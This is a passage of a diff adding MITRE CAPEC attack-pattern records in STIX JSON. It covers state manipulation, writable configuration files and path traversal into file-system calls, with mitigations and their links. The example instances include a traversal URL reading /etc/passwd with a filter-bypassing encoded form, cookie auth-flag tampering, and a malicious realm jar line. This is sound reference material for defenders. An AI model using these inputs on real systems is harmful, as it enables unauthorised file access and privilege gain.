"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5da4f75-8c61-4081-b026-75f19ec8f8a1", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--15e190ea-a35c-4658-b69e-402f5cec7ad9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bdccd87f-be5a-4567-acac-ded05ba22454", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Scan dynamically generated content against validation specification", + "id": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-73-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--fbbc43fd-aa0e-44e4-98a4-ff409bf08afb", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36312b31-f41b-4f9e-8a90-8f9bdabbaeec", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.\n State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. 
Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.\n If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data.\n ", + "external_references": [ + { + "external_id": "CAPEC-74", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1245", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1245.html" + }, + { + "external_id": "CWE-1253", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1253.html" + }, + { + "external_id": "CWE-1265", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1265.html" + }, + { + "external_id": "CWE-1271", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1271.html" + } + ], + "id": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulating State", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain 
Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.\n An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state.

Experiment

  1. The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target.

Exploit

  1. Having determined how to manipulate the state, the adversary can perform illegitimate actions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_prerequisites": [ + "User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.", + "There is a faulty finite state machine in the hardware logic that can be exploited." + ], + "x_capec_resources_required": [ + "The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox)." + ], + "x_capec_skills_required": { + "Medium": "The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.", + "id": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "target_ref": 
"attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.", + "id": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d901ded9-6bd3-4d45-b338-71715e666e92", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ea5c5ff6-e6bb-4b4a-8c73-9aa87a9f9974", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.", + "id": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2eab1469-094c-46e2-b78f-9a9d3108e08b", + "modified": "2021-06-24T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d2a63b7-8651-46d9-9b31-187b55061c36", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "All possible states must be handled by hardware finite state machines.", + "id": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-74-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0bde6497-61aa-43b6-b9ed-7a55f500f332", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--638372f7-a792-4269-acd6-cfb761391fd6", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.", + "external_references": [ + { + "external_id": "CAPEC-75", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + 
"url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Writeable Configuration Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. 
Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml\n < CustomRealmConfigurationData=\"java.util.Properties\"Name=\"CustomRealm\"RealmClassName=\"Maliciousrealm.jar\"/>\n \n The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Configuration files must be modifiable by the attacker" + ], + "x_capec_skills_required": { + "Medium": "To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--390b777d-a7f5-499e-b105-e88b8b537dc7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Backup copies of all configuration files", + "id": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1b2f0cb4-7979-41a9-b066-52623efd9be1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f72dfc6-fc40-4c50-b43a-fb3f8613c890", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Integrity monitoring for configuration files", + "id": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3b76047-8e3c-4ad6-890e-ee9b51ab15c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Enforce audit logging on code and configuration promotion procedures.", + "id": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f6c14a3-09ae-4833-b73c-17e14fa0ab03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD", + "id": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f3ed3dd-3d16-41fa-9408-5e346f652fed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. 
The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.", + "external_references": [ + { + "external_id": "CAPEC-76", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/76.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Web Input to File System Calls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user

  4. Techniques
    Spider web sites for all available links, entry points to the web site.
    Manually explore application and inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

  2. Techniques
    Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)
    Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests
    Inject context-appropriate malicious file system control syntax

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

  2. Techniques
    The attacker injects context-appropriate malicious file path to access the content of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.
    The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Program must allow for user controlled variables to be applied directly to the filesystem" + ], + "x_capec_skills_required": { + "Low": "To identify file system entry point and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--418adbc1-d3a0-4e06-b39d-4a47ced3edbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure all input is validated, and does not contain file system commands", + "id": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--33951a4d-6ab2-4bdb-854f-4f2794baa0aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7822e43d-f894-41ac-88d5-41b2c0b4ef6e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.", + "id": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80063d3f-3b3f-4552-bbbe-499aabc86961", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2b1d3bb-89ce-4615-be0c-c35eed6ad012", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.", + "external_references": [ + { + "external_id": "CAPEC-77", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-473", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": 